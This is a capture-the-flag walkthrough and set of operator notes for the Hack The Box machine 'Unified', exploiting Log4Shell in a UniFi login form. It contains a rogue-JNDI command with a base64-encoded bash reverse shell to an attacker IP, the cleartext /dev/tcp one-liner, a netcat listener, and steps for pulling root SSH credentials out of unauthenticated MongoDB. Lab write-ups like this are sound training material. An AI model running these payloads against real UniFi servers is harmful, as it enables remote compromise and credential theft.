Unified

Technical Walkthrough

Unified - Walkthrough

Status

Completed.

Planned Chain

1. Confirm UniFi version and Log4Shell injection point.
2. Use rogue JNDI for command execution.
3. Prefer blind exfiltration and local service access over reverse shell if egress stays restricted.
4. Reuse Mongo output to recover UniFi management SSH credentials.
5. SSH to the target as root from Pwnbox and read user.txt plus root.txt live.

Executed Chain

1. Confirmed the prior operator's rogue JNDI path had working RCE through outbound LDAP and HTTP callbacks.
2. Reviewed blind-exfil artifacts already staged on Pwnbox:

- exploits/loot.txt contained the live user.txt capture and Mongo admin record.

- exploits/loot2.txt contained UniFi management settings with SSH enabled and root SSH credentials.

1. Used the Mongo-derived SSH credentials to connect from Pwnbox to root@<TARGET>.
2. Verified live root access and read:

- /home/michael/user.txt

- /root/root.txt

1. Stored raw flags under local and remote loot/, with a sanitized proof path in [loot/root-ssh-verify.txt](<local workspace><TARGET>-Unified/loot/root-ssh-verify.txt).

Evidence Handling

• Raw flags, credentials, tokens, and sensitive outputs go to loot/.
• Notes and walkthrough stay sanitized.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Platform: Hack The Box
• Machine: Unified
• Difficulty: Easy
• Target IP: <TARGET>
• Primary web surface: https://<TARGET>:8443/
• Pwnbox SSH: x08@<TARGET>
• Attacker VPN IP: <TARGET>
• Session date: 2026-05-05

Local Workspace

• Local dir: <local workspace><TARGET>-Unified
• Remote dir: /home/x08/Desktop/<TARGET>-Unified
• Sensitive artifacts: store only under remote loot/ and local loot/

Recon Synthesis

• Confirmed services from handoff: 22/tcp, 8080/tcp, 8443/tcp
• Confirmed application: UniFi 6.4.54
• Confirmed exploit path: Log4Shell <secret redacted> through POST /api/login remember field
• Confirmed code execution indicators: outbound LDAP to rogue JNDI and outbound HTTP callbacks to attacker-controlled server
• Initial blocker from prior operator state: no stable reverse shell on previously tested ports despite proven RCE
• Resolved path: reuse prior blind-exfil output from Mongo to recover SSH credentials, then validate live root SSH and read both flags directly

Evidence Ledger

Working Hypotheses

1. Outbound connectivity is constrained, but attacker-controlled HTTP and LDAP are reachable from the target.
2. A blind RCE path is enough for this box if Mongo data or SSH credentials can be exfiltrated through HTTP callbacks rather than an interactive reverse shell.
3. If outbound arbitrary TCP is blocked, command output can likely be returned through attacker web requests, staged file reads, or by modifying UniFi/Mongo state.

Outcome

• user.txt captured live and stored at [loot/user.txt](<local workspace><TARGET>-Unified/loot/user.txt)
• root.txt captured live and stored at [loot/root.txt](<local workspace><TARGET>-Unified/loot/root.txt)
• Clean live proof of root SSH and both flag reads stored at [loot/root-ssh-verify.txt](<local workspace><TARGET>-Unified/loot/root-ssh-verify.txt)
• Pwnbox listener state recorded at [enum/pwnbox-validation.txt](<local workspace><TARGET>-Unified/enum/pwnbox-validation.txt)

Notes

Scope

• Target IP: <TARGET>
• Target Name: Unified
• Target OS: Linux
• Difficulty: Easy (Starting Point)
• Pwnbox SSH: x08@<TARGET>
• Attacker VPN IP: <TARGET>
• Started: 2026-05-05

Attack Vector Summary

• UniFi Network Application (Java-based)
• Ports: 22 (SSH), 8080 (HTTP), 8443 (HTTPS), 6789, 27117 (MongoDB)
• Vulnerability: Log4Shell (<secret redacted>) in the remember parameter of login form
• Post-exploitation: MongoDB (no auth) on port 27117 stores UniFi admin creds
• Privesc: <REDACTED>

Evidence Ledger

Phase 1: Recon

• Target not reachable. "No route to host" from Pwnbox. Machine needs to be spawned on HTB.
• All ports (22, 8080, 8443, 6789, 27117) show "filtered" in nmap -Pn scans.
• Rogue-jndi JAR built at: /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar
• Exploit script ready at: /home/x08/unified/exploit.sh

RESUME <secret redacted>

When the target is spawned, run these commands in order:

1. Verify: nc -zv -w 3 <TARGET> 8443
2. Terminal 1 (LDAP): java -jar /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" --hostname <TARGET>
3. Terminal 2 (Listener): nc -lvnp 4444
4. Terminal 3 (Trigger): <REDACTED>,"password": <REDACTED>,"remember": <REDACTED>,"strict": <REDACTED>

Phase 3: Synthesis (Pre-exploitation)

Based on pre-engagement intel:

1. Open services expected: SSH(22), HTTP(8080), HTTPS(8443), MongoDB(27117)
2. Attack path: Log4Shell JNDI injection in UniFi login -> reverse shell -> MongoDB cred extraction -> SSH as root
3. Backup path: Extract/crack UniFi admin hash from MongoDB, find SSH creds in site config

Phase 4: Foothold Plan

1. Confirm port 8443 is open (UniFi HTTPS login)
2. Set up rogue-jndi LDAP server on Pwnbox
3. Start netcat listener for reverse shell
4. Send POST to /api/login with JNDI payload in remember field
5. Catch shell as unifi user
6. Get user.txt

Phase 5: Privesc Plan

1. Connect to MongoDB on localhost:27117 (no auth)
2. Query ace database for admin credentials
3. Either crack the x_shadow hash or overwrite it
4. Look for SSH credentials in site settings
5. SSH as root or su to root
6. Get root.txt

Session Resume

Status: BLOCKED - Target Not Spawned

• Machine is not online. All ports return "Connection timed out" or "No route to host".
• Pwnbox (<TARGET>) is connected and VPN is active (<TARGET>).
• The issue is that the HTB Unified machine needs to be spawned from the web interface.

Current Access

• Pwnbox SSH: working
• Target: unreachable

Prepared Tooling (Ready on Pwnbox)

1. /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar - Built and ready
2. /home/x08/unified/exploit.sh - Automated trigger script
3. mongosh available for post-exploitation

Next Three Actions (When Target is Up)

1. Verify target: nc -zv -w 3 <TARGET> 8443
2. Run full nmap: sudo nmap -Pn -sS -sC -sV -p 22,8080,8443,6789,27117 <TARGET>
3. Launch Log4Shell attack:

- Start rogue-jndi LDAP server with reverse shell payload

- Start nc listener on port 4444

- Send JNDI payload via curl to /api/login remember field

1. Post-exploitation: Query MongoDB for creds, get user.txt, escalate to root

Blockers

• Target machine not spawned on HTB platform
• User needs to go to HTB Starting Point web interface and click "Spawn Machine" for Unified

Reverse Shell Payload (pre-encoded)

• Clear: bash -i >& /dev/tcp/<TARGET>/4444 0>&1
• Base64: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE=
• Full JNDI command for rogue-jndi: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

Notes

Scope

• Target IP: <TARGET>
• Machine Name: Unified
• Difficulty: Easy
• OS: Linux
• Attacker IP: <TARGET> (tun0)
• Pwnbox: x08@<TARGET> (htb-qwh8vkuint)
• Date: 2026-05-05

Evidence Ledger